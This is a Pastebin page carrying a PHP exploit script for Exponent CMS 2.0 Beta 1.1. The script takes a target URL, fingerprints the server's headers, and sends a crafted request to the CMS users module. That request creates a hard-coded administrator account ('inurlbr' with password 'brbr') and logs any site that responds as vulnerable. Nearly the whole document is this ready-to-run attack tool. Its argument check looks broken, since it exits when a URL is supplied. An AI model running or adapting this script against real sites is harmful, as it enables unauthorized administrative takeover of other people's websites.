Googleinurl

[EXPLOIT] Exponent CMS 2.0 Beta 1.1 CSRF Add ADM A

Dec 14th, 2014
861
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. error_reporting(1);
  4. set_time_limit(0);
  5. ini_set('display_errors', 1);
  6. ini_set('max_execution_time', 0);
  7. ini_set('allow_url_fopen', 1);
  8. ob_implicit_flush(true);
  9. ob_end_flush();
  10. //Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account
  11. //http://www.exploit-db.com/exploits/17235/
  12. print !empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL') : NULL;
  13. $argv[1] =  isset($argv[1]) && strstr($argv[1],'http') ? $argv[1] : "http://{$argv[1]}";
  14. !(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i", $argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL') : NULL;
  15. $line = "\n------------------------------------------------------------------------------------------------------------------";
  16. $config['alvo'] = $alvo_[0][0];
  17. $config['user'] = 'inurlbr';
  18. $config['pass1'] = 'brbr';
  19. $config['pass2'] = 'brbr';
  20. $config['email'] = 'you@mail.com';
  21. $config['firstname'] = 'name';
  22. $config['lastname'] = 'las name';
  23.  
  24. $config['exploit'] = "/exponent/index.php?module=users&action=update&username={$config['user']}&pass1={$config['pass1']}&pass2={$config['pass2']}&email={$config['email']}&firstname={$config['firstname']}&lastname={$config['lastname']}&is_acting_admin=1";
  25. $exec = $config['alvo'] . $config['exploit'];
  26. $headers = get_headers($argv[1], 1);
  27. print "\r\n0x[EXPLOIT NAME]: Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account / INURL - BRASIL";
  28. print $line;
  29. print "\n0x " . date("h:m:s") . " [INFO]: ";
  30. print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
  31. print "\n0x " . date("h:m:s") . " [INFO]: ";
  32. is_array($headers['Server']) ? print_r($headers['Server'][0]) : print_r($headers['Server']);
  33. print "\n0x " . date("h:m:s") . " [INFO]: ";
  34. is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) : print_r($headers['X-Powered-By']);
  35. print "\n0x " . date("h:m:s") . " [INFO]: TARGET: {$alvo_[0][0]}";
  36.  
  37. function __request($url) {
  38.  
  39.     $objcurl = curl_init();
  40.     curl_setopt($objcurl, CURLOPT_URL, $url);
  41.     curl_setopt($objcurl, CURLOPT_HEADER, 1);
  42.     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
  43.     curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
  44.     $corpo = curl_exec($objcurl);
  45.     return ($corpo);
  46. }
  47.  
  48. $rest = __request($exec);
  49. preg_match_all('(Server:.*)', $rest, $status['server']);
  50. print $line;
  51. if (!strstr($rest, 'Resource Not Found') && strstr($status['server'], '200')) {
  52.     $file = "\n0x " . date("h:m:s") . " [INFO][EXPLOIT]:: {$config['exploit']}";
  53.     $file.= "\n0x " . date("h:m:s") . " [INFO][RESULTADO]:: {IS VULL}";
  54.     print $file;
  55.     file_put_contents('lfd.txt', "{$line}{$file}{$line}\n", FILE_APPEND);
  56. } else {
  57.     print "\n0x " . date("h:m:s") . " [INFO][RESULTADO]:: {NOT VULL}";
  58. }
  59.  
  60. print $line;
  61. print $rest;
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×